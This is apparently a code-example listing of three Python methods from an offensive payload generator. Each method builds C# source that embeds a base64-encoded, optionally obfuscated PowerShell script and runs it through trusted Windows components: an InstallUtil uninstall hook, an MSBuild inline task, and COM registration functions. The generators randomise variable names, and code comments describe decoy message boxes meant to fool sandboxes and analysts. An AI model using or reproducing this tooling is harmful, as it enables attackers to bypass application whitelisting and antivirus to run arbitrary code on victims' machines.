Exemple #1
0
    def generate(self):
        options = []
        for option in self.cli_opts.c:
            if "," in option:
                options = option.split(",")
            if " " in option:
                options = option.split(" ")

        for o in options:
            for i in self.required_options:
                if i in o:
                    self.required_options[i][0] = o.strip("{0}=".format(i))

        with open(self.required_options["SCRIPT"][0], "r") as f:
            the_script = f.read()

        if self.required_options["FUNCTION"][0].lower() != "x":
            # Append FUNCTION to end of script
            the_script += "\n{0}".format(self.required_options["FUNCTION"][0])
            FunctionName = self.required_options["FUNCTION"][0]
        else:
            FunctionName = "\"None\""

        if self.required_options["OBFUSCATION"][0].lower() != "x":
            if self.required_options["OBFUSCATION"][0].lower() == "binary":
                the_script = invoke_obfuscation.binaryEncode(the_script)
            elif self.required_options["OBFUSCATION"][0].lower() == "ascii":
                the_script = invoke_obfuscation.asciiEncode(the_script)
            else:
                the_script = invoke_obfuscation.binaryEncode(the_script)

        # randomize all our variable names, yo'
        className = bypass_helpers.randomString()
        classNameTwo = bypass_helpers.randomString()
        classNameThree = bypass_helpers.randomString()
        execName = bypass_helpers.randomString()
        bytearrayName = bypass_helpers.randomString()
        funcAddrName = bypass_helpers.randomString()
        savedStateName = bypass_helpers.randomString()
        messWithAnalystName = bypass_helpers.randomString()
        shellcodeName = bypass_helpers.randomString()
        rand_bool = bypass_helpers.randomString()
        random_out = bypass_helpers.randomString()


        hThreadName = bypass_helpers.randomString()
        threadIdName = bypass_helpers.randomString()
        pinfoName = bypass_helpers.randomString()
        num_tabs_required = 0

        # get random variables for the API imports
        r = [bypass_helpers.randomString() for x in range(16)]
        y = [bypass_helpers.randomString() for x in range(17)]

        #required syntax at the beginning of any/all payloads
        payload_code = "using System; using System.Net; using System.Linq; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading; using System.Configuration.Install; using System.Windows.Forms;using System.Reflection; using System.Collections.ObjectModel; using System.Management.Automation; using System.Management.Automation.Runspaces; using System.Text;\n"
        payload_code += "\tpublic class {0} {{\n".format(className)
        payload_code += "\t\tpublic static void Main()\n\t\t{\n"
        # lets add a message box to throw offf sandbox heuristics and analysts :)
        # there is no decryption routine, troll.level = 9000
        # TODO: add a fake decryption function that does nothing and accepts messWithAnalystName as a parameter.
        payload_code += "\t\t\twhile(true)\n{{ MessageBox.Show(\"doge\"); Console.ReadLine();}}\n"
        payload_code += "\t\t}\n\t}\n\n"
        payload_code += "\t[System.ComponentModel.RunInstaller(true)]\n"
        payload_code += "\tpublic class {0} : System.Configuration.Install.Installer\n\t{{\n".format(classNameTwo)
        payload_code += "\t\tpublic override void Uninstall(System.Collections.IDictionary {0})\n\t\t{{\n".format(savedStateName)
        payload_code += "\t\t\t{0}.{1}();\n\t\t}}\n\t}}\n".format(classNameThree, execName)
        payload_code += "\n\tpublic class {0}\n\t{{".format(classNameThree)
        payload_code += "\n\t\tpublic static void {0}() {{\n".format(execName)
        payload_code2, num_tabs_required = gamemaker.senecas_games(self)
        payload_code = payload_code + payload_code2

        encodedScript = bypass_helpers.randomString()
        encodedScriptContents = base64.b64encode(bytes(the_script, 'latin-1')).decode('ascii')
        powershellCmd = bypass_helpers.randomString()
        data = bypass_helpers.randomString()
        command = bypass_helpers.randomString()
        RunPSCommand = bypass_helpers.randomString()
        cmd = bypass_helpers.randomString()
        runspace = bypass_helpers.randomString()
        scriptInvoker = bypass_helpers.randomString()
        pipeline = bypass_helpers.randomString()
        results = bypass_helpers.randomString()
        stringBuilder = bypass_helpers.randomString()
        obj = bypass_helpers.randomString()
        RunPSFile = bypass_helpers.randomString()
        script = bypass_helpers.randomString()
        ps = bypass_helpers.randomString()
        e = bypass_helpers.randomString()

        payload_code += """string {0} = "{1}";
                    string {2} = "";

                    byte[] {3} = Convert.FromBase64String({0});
                    string {4} = Encoding.ASCII.GetString({3});
                    {2} = {4};

                    try
                    {{
                        Console.Write({5}({2}));
                    }}
                    catch (Exception {6})
                    {{
                        Console.Write({6}.Message);
                    }}""".format(encodedScript, encodedScriptContents, powershellCmd, data, command, RunPSCommand, e)

        while (num_tabs_required != 0):
            payload_code += '\t' * num_tabs_required + '}'
            num_tabs_required -= 1

        payload_code +="""}}

                public static string {0}(string {1})
                {{

                    Runspace {2} = RunspaceFactory.CreateRunspace();
                    {2}.Open();
                    RunspaceInvoke {3} = new RunspaceInvoke({2});
                    Pipeline {4} = {2}.CreatePipeline();


                    {4}.Commands.AddScript({1});


                    {4}.Commands.Add("Out-String");
                    Collection<PSObject> {5} = {4}.Invoke();
                    {2}.Close();


                    StringBuilder {6} = new StringBuilder();
                    foreach (PSObject {7} in {5})
                    {{
                        {6}.Append({7});
                    }}
                    return {6}.ToString().Trim();
                 }}

                 public static void {8}(string {9})
                {{
                    PowerShell {10} = PowerShell.Create();
                    {10}.AddScript({9}).Invoke();
                }}""".format(RunPSCommand, cmd, runspace, scriptInvoker, pipeline, results, stringBuilder, obj, RunPSFile, script, ps)

        payload_code += "\n}"
        self.payload_source_code = payload_code
        return
Exemple #2
0
    def generate(self):
        options = []
        for option in self.cli_opts.c:
            if "," in option:
                options = option.split(",")
            if " " in option:
                options = option.split(" ")

        for o in options:
            for i in self.required_options:
                if i in o:
                    self.required_options[i][0] = o.strip("{0}=".format(i))
        # randomize all our variable names, yo'
        targetName = bypass_helpers.randomString()
        namespaceName = bypass_helpers.randomString()
        className = bypass_helpers.randomString()
        FunctionName = bypass_helpers.randomString()

        num_tabs_required = 0

        # get 12 random variables for the API imports
        r = [bypass_helpers.randomString() for x in range(12)]
        y = [bypass_helpers.randomString() for x in range(17)]

        with open(self.required_options["SCRIPT"][0], "r") as f:
            the_script = f.read()

        if self.required_options["OBFUSCATION"][0].lower() != "x":
            if self.required_options["FUNCTION"][0] != "x":
                # Append FUNCTION to end of script
                the_script += "\n{0}".format(
                    self.required_options["FUNCTION"][0])
                if self.required_options["OBFUSCATION"][0].lower() == "binary":
                    the_script = invoke_obfuscation.binaryEncode(the_script)
                elif self.required_options["OBFUSCATION"][0].lower(
                ) == "ascii":
                    the_script = invoke_obfuscation.asciiEncode(the_script)
                self.required_options["FUNCTION"][0] = "x"
            else:
                if self.required_options["OBFUSCATION"][0].lower() == "binary":
                    the_script = invoke_obfuscation.binaryEncode(the_script)
                elif self.required_options["OBFUSCATION"][0].lower(
                ) == "ascii":
                    the_script = invoke_obfuscation.asciiEncode(the_script)
                self.required_options["FUNCTION"][0] = "x"

        if self.required_options["FUNCTION"][0].lower() != "x":
            # The header for MSBuild XML files
            # TODO: Fix the awful formatting
            # Set FUNCTION to None if using Invoke-Obfuscation
            msbuild_header = """<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">\n<!-- C:\Windows\Microsoft.NET\Framework\\v4.0.30319\msbuild.exe SimpleTasks.csproj -->\n\t
            <PropertyGroup>
                <FunctionName Condition="'$(FunctionName)' == ''">{2}</FunctionName>
            </PropertyGroup>
            <Target Name="{0}">
                <{1} />
              </Target>
              <UsingTask
                TaskName="{1}"
                TaskFactory="CodeTaskFactory"
                AssemblyFile="C:\Windows\Microsoft.Net\Framework\\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
                <Task>
                    <Reference Include="System.Management.Automation" />
                <Code Type="Class" Language="cs">
                  <![CDATA[
            """.format(targetName, className,
                       self.required_options["FUNCTION"][0])
        else:
            # The header for MSBuild XML files
            # TODO: Fix the awful formatting
            # Set FUNCTION to None if using Invoke-Obfuscation
            msbuild_header = """<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">\n\t
            <PropertyGroup>
                <FunctionName Condition="'$(FunctionName)' == ''">{2}</FunctionName>
            </PropertyGroup>
            <Target Name="{0}">
                <{1} />
              </Target>
              <UsingTask
                TaskName="{1}"
                TaskFactory="CodeTaskFactory"
                AssemblyFile="C:\Windows\Microsoft.Net\Framework\\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
                <Task>
                    <Reference Include="System.Management.Automation" />
                <Code Type="Class" Language="cs">
                  <![CDATA[
            """.format(targetName, className, "None")

            if self.required_options["OBFUSCATION"][0].lower() != "x":
                if self.required_options["OBFUSCATION"][0].lower() == "binary":
                    the_script = invoke_obfuscation.binaryEncode(the_script)
                elif self.required_options["OBFUSCATION"][0].lower(
                ) == "ascii":
                    the_script = invoke_obfuscation.asciiEncode(the_script)

        #required syntax at the beginning of any/all payloads
        payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Threading; using System.IO; using System.Reflection; using System.Runtime.InteropServices; using System.Collections.ObjectModel; using System.Management.Automation; using System.Management.Automation.Runspaces; using System.Text; using Microsoft.Build.Framework; using Microsoft.Build.Utilities;\n"
        payload_code += "public class %s : Task, ITask {\n" % (className)
        payload_code += "\npublic string {0} = \"$(FunctionName)\";".format(
            FunctionName)

        payload_code2, num_tabs_required = gamemaker.senecas_games(self)
        payload_code = payload_code + payload_code2

        encodedScript = bypass_helpers.randomString()
        encodedScriptContents = base64.b64encode(bytes(
            the_script, 'latin-1')).decode('ascii')
        powershellCmd = bypass_helpers.randomString()
        data = bypass_helpers.randomString()
        command = bypass_helpers.randomString()
        RunPSCommand = bypass_helpers.randomString()
        cmd = bypass_helpers.randomString()
        runspace = bypass_helpers.randomString()
        scriptInvoker = bypass_helpers.randomString()
        pipeline = bypass_helpers.randomString()
        results = bypass_helpers.randomString()
        stringBuilder = bypass_helpers.randomString()
        obj = bypass_helpers.randomString()
        RunPSFile = bypass_helpers.randomString()
        script = bypass_helpers.randomString()
        ps = bypass_helpers.randomString()
        e = bypass_helpers.randomString()

        payload_code += """string {0} = "{1}";
                    string {2} = "";

					if ({3} != "None")
					{{
						byte[] {4} = Convert.FromBase64String({0});
						string {5} = Encoding.ASCII.GetString({4});
						{2} = {5} + "" + {3};
					}}
                    else
                    {{
                        byte[] {4} = Convert.FromBase64String({0});
                        string {5} = Encoding.ASCII.GetString({4});
                        {2} = {5};
                    }}

					try
					{{
						Console.Write({6}({2}));
					}}
					catch (Exception {7})
					{{
						Console.Write({7}.Message);
					}}""".format(encodedScript, encodedScriptContents, powershellCmd,
                  FunctionName, data, command, RunPSCommand, e)

        while (num_tabs_required != 0):
            payload_code += '\t' * num_tabs_required + '}'
            num_tabs_required -= 1

        payload_code += """return true;
				}}

				//Based on Jared Atkinson's And Justin Warner's Work
				public static string {0}(string {1})
				{{

					Runspace {2} = RunspaceFactory.CreateRunspace();
					{2}.Open();
					RunspaceInvoke {3} = new RunspaceInvoke({2});
					Pipeline {4} = {2}.CreatePipeline();


					{4}.Commands.AddScript({1});


					{4}.Commands.Add("Out-String");
					Collection<PSObject> {5} = {4}.Invoke();
					{2}.Close();


					StringBuilder {6} = new StringBuilder();
					foreach (PSObject {7} in {5})
					{{
						{6}.Append({7});
					}}
					return {6}.ToString().Trim();
				 }}

				 public static void {8}(string {9})
				{{
					PowerShell {10} = PowerShell.Create();
					{10}.AddScript({9}).Invoke();
				}}""".format(RunPSCommand, cmd, runspace, scriptInvoker, pipeline, results,
                 stringBuilder, obj, RunPSFile, script, ps)

        payload_code += "}\n\t\t\t\t]]>\n\t\t\t</Code>\n\t\t</Task>\n\t</UsingTask>\n</Project>"
        payload_code = msbuild_header + payload_code

        self.payload_source_code = payload_code
        return
Exemple #3
0
    def generate(self):

        with open(self.required_options["SCRIPT"][0], "r") as f:
            the_script = f.read()

        if self.required_options["FUNCTION"][0].lower() != "x":
            # Append FUNCTION to end of script
            the_script += "\n{0}".format(self.required_options["FUNCTION"][0])
            FunctionName = self.required_options["FUNCTION"][0]

        if self.required_options["OBFUSCATION"][0].lower() != "x":
            if self.required_options["OBFUSCATION"][0].lower() == "binary":
                the_script = invoke_obfuscation.binaryEncode(the_script)
            elif self.required_options["OBFUSCATION"][0].lower() == "ascii":
                the_script = invoke_obfuscation.asciiEncode(the_script)
            else:
                the_script = invoke_obfuscation.binaryEncode(the_script)

        # randomize all our variable names, yo'
        className = bypass_helpers.randomString()
        classNameTwo = bypass_helpers.randomString()
        namespace = bypass_helpers.randomString()
        key = bypass_helpers.randomString()
        execName = bypass_helpers.randomString()

        num_tabs_required = 0

        # get random variables for the API imports
        r = [bypass_helpers.randomString() for x in range(16)]
        y = [bypass_helpers.randomString() for x in range(17)]

        #required syntax at the beginning of any/all payloads
        payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Threading; using System.EnterpriseServices; using System.Runtime.InteropServices; using System.Windows.Forms;using System.Reflection; using System.Collections.ObjectModel; using System.Management.Automation; using System.Management.Automation.Runspaces; using System.Text;\n"
        payload_code += "namespace {0}\n {{".format(namespace)
        payload_code += "\n\tpublic class {0} : ServicedComponent {{\n".format(
            className)
        # placeholder for legitimate C# program
        # lets add a message box to throw offf sandbox heuristics and analysts :)
        payload_code += '\n\t\tpublic {0}() {{ Console.WriteLine("doge"); }}\n'.format(
            className)
        payload_code += "\n\t\t[ComRegisterFunction]"
        payload_code += "\n\t\tpublic static void RegisterClass ( string {0} )\n\t\t{{\n".format(
            key)
        payload_code += "\t\t\t{0}.{1}();\n\t\t}}\n".format(
            classNameTwo, execName)
        payload_code += "\n[ComUnregisterFunction]"
        payload_code += "\n\t\tpublic static void UnRegisterClass ( string {0} )\n\t\t{{\n".format(
            key)
        payload_code += "\t\t\t{0}.{1}();\n\t\t}}\n\t}}\n".format(
            classNameTwo, execName)

        payload_code += "\n\tpublic class {0}\n\t{{".format(classNameTwo)
        payload_code += "\n\t\tpublic static void {0}() {{\n".format(execName)
        payload_code2, num_tabs_required = gamemaker.senecas_games(self)
        payload_code = payload_code + payload_code2

        encodedScript = bypass_helpers.randomString()
        encodedScriptContents = base64.b64encode(bytes(
            the_script, 'latin-1')).decode('ascii')
        powershellCmd = bypass_helpers.randomString()
        data = bypass_helpers.randomString()
        command = bypass_helpers.randomString()
        RunPSCommand = bypass_helpers.randomString()
        cmd = bypass_helpers.randomString()
        runspace = bypass_helpers.randomString()
        scriptInvoker = bypass_helpers.randomString()
        pipeline = bypass_helpers.randomString()
        results = bypass_helpers.randomString()
        stringBuilder = bypass_helpers.randomString()
        obj = bypass_helpers.randomString()
        RunPSFile = bypass_helpers.randomString()
        script = bypass_helpers.randomString()
        ps = bypass_helpers.randomString()
        e = bypass_helpers.randomString()

        payload_code += """string {0} = "{1}";
                    string {2} = "";

                    byte[] {3} = Convert.FromBase64String({0});
                    string {4} = Encoding.ASCII.GetString({3});
                    {2} = {4};

                    try
                    {{
                        Console.Write({5}({2}));
                    }}
                    catch (Exception {6})
                    {{
                        Console.Write({6}.Message);
                    }}""".format(encodedScript, encodedScriptContents,
                                 powershellCmd, data, command, RunPSCommand, e)

        while (num_tabs_required != 0):
            payload_code += '\t' * num_tabs_required + '}'
            num_tabs_required -= 1

        payload_code += """}}

                public static string {0}(string {1})
                {{

                    Runspace {2} = RunspaceFactory.CreateRunspace();
                    {2}.Open();
                    RunspaceInvoke {3} = new RunspaceInvoke({2});
                    Pipeline {4} = {2}.CreatePipeline();


                    {4}.Commands.AddScript({1});


                    {4}.Commands.Add("Out-String");
                    Collection<PSObject> {5} = {4}.Invoke();
                    {2}.Close();


                    StringBuilder {6} = new StringBuilder();
                    foreach (PSObject {7} in {5})
                    {{
                        {6}.Append({7});
                    }}
                    return {6}.ToString().Trim();
                 }}

                 public static void {8}(string {9})
                {{
                    PowerShell {10} = PowerShell.Create();
                    {10}.AddScript({9}).Invoke();
                }}""".format(RunPSCommand, cmd, runspace, scriptInvoker,
                             pipeline, results, stringBuilder, obj, RunPSFile,
                             script, ps)

        payload_code += "\n}" * 2

        self.payload_source_code = payload_code
        return